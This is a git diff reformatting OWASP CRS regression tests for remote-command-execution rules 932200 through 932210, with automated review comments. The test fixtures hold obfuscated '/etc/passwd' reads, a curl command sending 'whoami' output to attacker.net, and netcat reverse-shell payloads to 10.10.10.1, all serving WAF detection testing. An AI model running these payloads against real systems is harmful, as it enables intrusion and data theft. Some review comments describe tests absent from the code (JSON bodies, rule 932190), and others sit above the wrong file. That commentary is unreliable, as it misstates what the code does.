a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index ba760012d..78c7f5ec9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml 
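Review bot: Tests 5 and 6 send a JSON body with `method: GET`; a body on GET has no defined semantics and may be dropped or left unparsed by the server or a proxy in front of the engine, so the `log_contains: id "932190"` assertions for the quote and backslash evasion payloads can fail for reasons unrelated to the rule. Switching those two stages to `method: POST` with `uri: "/post"` keeps the body processor in the path deterministically. The escaping in test 6's `data` looks correct as written: YAML `\\\\` yields `\\` on the wire, which JSON decodes to a single backslash.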
@@ -2,265 +2,248 @@ meta: author: "theMiddle, Franziska Bühler, Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932200.yaml +rule_id: 932200 tests: - - test_title: 932200-1 + - test_id: 1 desc: globbing patterns stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 2 desc: uninitialized variable stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 3 desc: bash function stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - 
User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 4 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 5 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: 
localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%21at%2B%2Fet%24%21c%2Fpas%24%21swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 6 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%2Aat%2B%2Fet%24%2Ac%2Fpas%24%2Aswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 7 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%3Fat%2B%2Fet%24%3Fc%2Fpas%24%3Fswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 8 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24-at%2B%2Fet%24-c%2Fpas%24-swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 9 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24_at%2B%2Fet%24_c%2Fpas%24_swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 10 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-11 + - input: + dest_addr: 127.0.0.1 + 
headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%24%24at%2B%2Fet%24%24c%2Fpas%24%24swd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 11 desc: "Test first backslash match ([*?`\\'][^/\n]+/) with: c\at /etc/passwd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;c%5Cat%20%2Fetc%2Fpasswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 12 desc: "Test second backslash match (/[^/]+?[*?`\\']) with: cat /etc/p\asswd" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat%20%2Fetc%2Fp%5Casswd" + version: HTTP/1.0 + output: + 
log_contains: id "932200" + - test_id: 13 desc: "Test correct logging" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - no_log_contains: found within MATCHED_VAR - - test_title: 932200-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + no_log_contains: found within MATCHED_VAR + - test_id: 14 desc: "Test variable assignment ('cat /etc/passwd' assigned via individual variables, cat in reverse order)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-15 + - input: + dest_addr: 127.0.0.1 + data: exec=c4%3D%5C%20%3Bc3%3Dt%3Bc2%3Da%3Bc1%3Dc%3Ba1%3D%2F%3Ba2%3De%3Ba3%3Dt%3Ba4%3Dc%3Ba5%3D%2F%3Ba6%3Dp%3Ba7%3Da%3Ba8%3Ds%3Ba9%3Ds%3Ba10%3Dw%3Ba11%3Dd%3B%24c1%24c2%24c3%24c4%24a1%24a2%24a3%24a4%24a5%24a6%24a7%24a8%24a9%24a10%24a11%0A + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: 
"OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 15 desc: "Add test to match BB EBIDJ91T" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-16 + - input: + dest_addr: 127.0.0.1 + data: cmd%3Da%3Dcurl%26%26b%3D%60whoami%60%26%26%24a%20attacker.net%2F%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 16 desc: "Add test to match BB MKXQCJMX" stages: - - stage: - input: - dest_addr: 127.0.0.1 - data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - output: - log_contains: id "932200" + - input: + dest_addr: 127.0.0.1 + data: cmd=a%3D%2Fetc%26%26b%3D%2Fpasswd%26%26c%3Dcat%26%26%24c%20%24a%24b + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + output: + log_contains: id "932200" 
diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml index e79b47c6e..4873cd347 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932205.yaml 
@@ -2,125 +2,117 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932205.yaml +rule_id: 932205 tests: - - test_title: 932205-1 + - test_id: 1 desc: Referer without query string, trying to evade query string match stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com;c$?at+/etc/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com;c$?at+/etc/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932205" + - test_id: 2 desc: Referer header with query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932205" + - test_id: 3 desc: Referer header with canonical path, query string and obvious payload stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: 
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932205" - - test_title: 932205-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "www.google.com/?param=;/bin/ca?+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932205" + - test_id: 4 desc: False positive test against query string and space in a parameter stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" + - test_id: 5 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: 
HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" + - test_id: 6 desc: False positive test against syntax highlighter (generic) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" - - test_title: 932205-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://coreruleset.org/#:~:text=generic%20attack%20detection" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" + - test_id: 7 desc: False positive test against fragment (scroll to text fragment) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932205" + - input: + 
dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "https://www.google.com/url?q=https://example.com/path/#:~:text=Inoltre%2C%20non%20vi%20sono%20evidenze,'immaginario%20comune%20(1).&sa=U&ved=2ahUKEwjSluGs8eX9AhWiSvEDHaaEChEQFnoECAgQBQ&usg=AOvVaw1_nmpM50Zh9-mGx1DsMw7j" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932205" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml index d795b05f2..dfbd11e85 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932206.yaml 
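Review bot: The false-positive cases (test_id 4 through 7) assert only `no_log_contains: id "932205"`, so they also pass when the request never reaches the rule engine at all — a server that rejects the request with a 4xx before inspection satisfies the check vacuously. Pinning the response code next to the log assertion, e.g. `output:` / `  no_log_contains: id "932205"` / `  status: 200`, makes each negative test prove that the payload was inspected and not flagged, assuming the runner's output schema accepts a `status` key. The positive cases (test_id 1 through 3) need no change, since a logged rule id already implies the engine saw the request.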
@@ -2,57 +2,53 @@ meta: author: "Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932206.yaml +rule_id: 932206 tests: - - test_title: 932206-1 + - test_id: 1 desc: Referer header without URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "/bin/ca't'+/et*/passwd" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932206" - - test_title: 932206-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "/bin/ca't'+/et*/passwd" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932206" + - test_id: 2 desc: False positive test against URL stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page?param=test+test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" - - test_title: 932206-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page?param=test+test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932206" + - test_id: 3 desc: False positive test against query string and space in path stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - Referer: "http://www.example.com/page%20test?param=test" - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - no_log_contains: id "932206" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + Referer: "http://www.example.com/page%20test?param=test" + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + no_log_contains: id "932206" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml index 386492d8b..568668e67 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932210.yaml 
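Review bot: The desc of test_id 1, `Referer header without URL`, names only the carrier and not the evasion being exercised: the payload `/bin/ca't'+/et*/passwd` splits the command with single quotes and replaces part of the path with a glob, and someone reading a failing run cannot tell which technique regressed. Suggest `desc: "Referer header without URL, command split by single quotes and path glob"`. Tests 2 and 3 reuse the false-positive inputs of the 932205 file verbatim, which is fine for coverage, but a short comment above them saying the negative cases are intentionally shared with 932205 would save the next maintainer a diff.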
@@ -2,122 +2,114 @@ meta: author: "flo405, Franziska Bühler, azurit" description: SQLite System Command Execution - enabled: true - name: 932210.yaml +rule_id: 932210 tests: - - test_title: 932210-1 + - test_id: 1 desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 2 desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=%22;\\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 3 desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n" stages: - - stage: - input: - 
dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" - version: HTTP/1.0 - output: - log_contains: id "932210" - - test_title: 932210-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?foo=;\\n.system%20nc%2010.10.10.1%206666%20-e%20sh\\n" + version: HTTP/1.0 + output: + log_contains: id "932210" + - test_id: 4 desc: ";\n.databases" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?foo=;\\n.databases" - version: HTTP/1.0 